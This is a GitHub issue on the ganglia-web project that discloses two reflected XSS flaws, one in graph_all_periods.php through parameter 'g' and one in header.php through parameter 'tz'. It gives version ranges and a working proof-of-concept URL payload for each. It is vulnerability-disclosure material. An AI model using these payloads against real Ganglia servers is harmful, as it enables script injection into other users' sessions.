Skip to content

There are two xss in different version ranges #382

@fenglin-1

Description

@fenglin-1

The first XSS release: 3.73<=Ganglia-web<3.75
Vulnerability cause:
https://github.com/ganglia/ganglia-web/blob/3.7.3/graph_all_periods.php
The parameters passed in are not restricted, and the trigger point is the parameter g.
Snipaste_2024-11-07_21-11-39
Vulnerability poc:
http://xxxxxx/ganglia//graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(1)//%22

The second XSS release: 3.73<=Ganglia-web<=3.76
Vulnerability cause:
https://github.com/ganglia/ganglia-web/blob/master/header.php
The parameters passed in are not restricted, and the trigger point is the parameter tz.
Snipaste_2024-11-07_21-14-31
Vulnerability poc:
http://xxxx/ganglia/?tz=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://xxxx/?tz=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions